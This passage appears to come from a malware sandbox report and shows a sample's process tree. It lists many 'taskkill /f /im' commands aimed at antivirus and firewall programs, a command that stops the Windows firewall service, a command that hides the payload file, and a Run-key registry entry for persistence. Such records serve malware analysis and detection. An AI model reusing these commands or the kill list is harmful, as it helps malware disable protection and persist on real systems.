- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cleaner.exe
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cleanpc.exe
    3⤵
    PID:948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cmon016.exe
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im connectionmonitor.exe
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cpf9x206.exe
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im defalert.exe
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im defence.exe
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im defense.exe
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im defwatch.exe
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im doors.exe
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im drwatson.exe
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im dvp95_0.exe
    3⤵
    - Modifies WinLogon for persistence
    - Adds policy Run key to start application
    - Modifies Installed Components in the registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\server_mail.exe.bat
      4⤵
      PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im edisk.exe
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im efpeadm.exe
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im escanh95.exe
    3⤵
    - Kills process with taskkill
    PID:1192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im espwatch.exe
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im evpn.exe
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im exantivirus -cnet.exe
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fameh32.exe
    3⤵
    - Kills process with taskkill
    PID:2316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fch32.exe
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fih32.exe
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im firewall.exe
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fix-it.exe
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fnrb32.exe
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fp -win_trial.exe
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsaa.exe
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsav32.exe
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsave32.exe
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsgk32.exe
    3⤵
    PID:952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsm32.exe
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fsma32.exe
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im fwenc.exe
    3⤵
    PID:688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im gbmenu.exe
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im gbpoll.exe
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im generics.exe
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im grief3878.exe
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im guarddog.exe
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im HackerEliminator.exe
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iamserv.exe
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ibmavsp.exe
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im icload95.exe
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im icmon.exe
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im icsuppnt.exe
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ifw2000.exe
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im inoculateit.exe
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iris.exe
    3⤵
    - Kills process with taskkill
    PID:2472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iparmor.exe
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iomon98.exe
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im isrv95.exe
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im kavpf.exe
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ldpromenu.exe
    3⤵
    PID:336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im localnet.exe
    3⤵
    PID:452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im lookout.exe
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im luall.exe
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im luspt.exe
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcagent.exe
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcshield.exe
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcshieldvvstat.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcupdate.exe
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcvsshld.exe
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mghtml.exe
    3⤵
    PID:892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im minilog.exe
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im monitor.exe
    3⤵
    - Kills process with taskkill
    PID:2652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im monsysnt.exe
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpfservice.exe
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mpftray.exe
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im msinfo32.exe
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mwatch.exe
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im n32scanw.exe
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im NAV DefAlert.exe
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navalert.exe
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navapsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\services.exe
      C:\Windows\services.exe -XP
      4⤵
      Modifies WinLogon for persistence
      Adds policy Run key to start application
      Modifies Installed Components in the registry
      Executes dropped EXE
      Loads dropped DLL
      Modifies WinLogon
      Drops file in System32 directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navengnavex15.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navnt.exe
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im navstub.exe
    3⤵
    - Kills process with taskkill
    PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im neomonitor.exe
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im net2000.exe
    3⤵
    - Kills process with taskkill
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netarmor.exe
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netinfo.exe
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netpro.exe
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netprotect.exe
    3⤵
    - Kills process with taskkill
    PID:2076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netspyhunter -1.2.exe
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im netutils.exe
    3⤵
    - Kills process with taskkill
    PID:784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nimda.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nisum.exe
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nmain.exe
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nod32.exe
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norman.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2280
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norman_av.exe
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im normanav.exe
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im normist.exe
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norton.exe
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im notstart.exe
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im npfw.exe
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nprotect.exe
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im npssvc.exe
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nsched32.exe
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nschednt.exe
    3⤵
    PID:928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nsplugin.exe
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ntvdm.exe
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nui.exe
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nvarch16.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2512
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nvsvc32.exe
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nwtool16.exe
    3⤵
    - Kills process with taskkill
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im OPScan.exe
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im outpost.exe
    3⤵
    PID:588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im panda.exe
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pavcl.exe
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pavsched.exe
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pccguide.exe
    3⤵
    PID:972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pccntmon.exe
    3⤵
    PID:572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pccwin98.exe
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pcscan.exe
    3⤵
    PID:764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pingscan.exe
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pop3trap.exe
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im poproxy.exe
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im portmonitor.exe
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pptbc.exe
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im processmonitor.exe
    3⤵
    - Kills process with taskkill
    PID:2448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im programauditor.exe
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im protectx.exe
    3⤵
    - Kills process with taskkill
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im purge.exe
    3⤵
    PID:940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pw32.exe
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rav.exe
    3⤵
    PID:2936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im realmon.exe
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rescue.exe
    3⤵
    PID:1824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rrguard.exe
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rtvscn95.exe
    3⤵
    - Kills process with taskkill
    PID:1464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im safeweb.exe
    3⤵
    PID:588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sbserv.exe
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im scanpm.exe
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sd.exe
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im serv95.exe
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sh.exe
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im shn.exe
    3⤵
    PID:900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sofi.exe
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sophos_av.exe
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spf.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spy.exe
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spyx.exe
    3⤵
    - Kills process with taskkill
    PID:2000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im srwatch.exe
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im st2.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im supp95.exe
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sweep95.exe
    3⤵
    PID:936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sweepsrv.sys.exe
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im swnetsup.exe
    3⤵
    PID:800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Symantec Core LC.exe
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im symproxysvc.exe
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sysedit.exe
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im taumon.exe
    3⤵
    - Kills process with taskkill
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tbscan.exe
    3⤵
    - Kills process with taskkill
    PID:2312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tcm.exe
    3⤵
    PID:596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tds2 -98.exe
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tfak.exe
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tgbob.exe
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im trjscan.exe
    3⤵
    - Kills process with taskkill
    PID:2340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im undoboot.exe
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vbcmserv.exe
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vbust.exe
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vet32.exe
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vettray.exe
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im virus.exe
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im virusmdpersonalfirewall.exe
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vnpc3000.exe
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vptray.exe
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsched.exe
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsecomr.exe
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vshwin32vbcmserv.exe
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsstat.exe
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vswinntse.exe
    3⤵
    - Kills process with taskkill
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im watchdog.exe
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im webscanx.exe
    3⤵
    - Kills process with taskkill
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wgfe95.exe
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wimmun32.exe
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im winroute.exe
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im winsfcm.exe
    3⤵
    PID:676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wqkmm3878.exe
    3⤵
    PID:596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wrctrl.exe
    3⤵
    PID:652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wyvernworksfirewall.exe
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im zapro.exe
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im zauinst.exe
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +A +S +H "c:\server.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2260
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kill /t REG_SZ /d c:\windows\server.exe
    3⤵
    - Modifies registry key
    PID:2748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im zonealarm.exe
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im zatutor.exe
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wsbgate.exe
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wradmin.exe
    3⤵
    PID:480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wnt.exe
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im winrecon.exe
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im whoswatchingme.exe
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wfindv32.exe
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im webtrap.exe
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im w9x.exe
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vswin9xe.exe
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsmon.exe
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsmain.exe
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vshwin32.exe
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vscan40.exe
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vpfw30s.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vpc32.exe
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vnlan300.exe
    3⤵
    - Kills process with taskkill
    PID:2604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vir -help.exe
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vet95.exe
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vcontrol.exe
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vccmserv.exe
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vbwinntw.exe
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vbwin9x.exe
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vbcons.exe
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im update.exe
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im TrueVector.exe
    3⤵
    - Kills process with taskkill
    PID:788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im trojantrap3.exe
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im trendmicro.exe
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tfak5.exe
    3⤵
    PID:588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tds2 -nt.exe
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tds -3.exe
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tctca.exe
    3⤵
    - Kills process with taskkill
    PID:480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tauscan.exe
    3⤵
    PID:676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im taskmon.exe
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im symtray.exe
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im symlcsvc.exe
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im symantec.exe
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sweepsrv.sysvshwin32.exe
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sweepnet.exe
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im supporter5.exe
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im supftrl.exe
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ss3edit.exe
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spyxx.exe
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spygate.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sphinx.exe
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sophosav.exe
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sophos.exe
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im smc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sharedaccess.exe
    3⤵
    - Kills process with taskkill
    PID:572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sfc.exe
    3⤵
    PID:972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im SENS.exe
    3⤵
    - Kills process with taskkill
    PID:2856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im scrscan.exe
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im scan95.exe
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im scan32.exe
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im scan.exe
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im SBservice.exe
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im SAVscan.exe
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rulaunch.exe
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rshell.exe
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im regrun2.exe
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rav7win.exe
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rav7.exe
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im qconsole.exe
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pview95.exe
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pspf.exe
    3⤵
    - Kills process with taskkill
    PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im proport.exe
    3⤵
    - Kills process with taskkill
    PID:2956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im procexplorerv10#.exe
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ppvstop.exe
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ppinupdt.exe
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im portdetective.exe
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im platin.exe
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im pfwadmin.exe
    3⤵
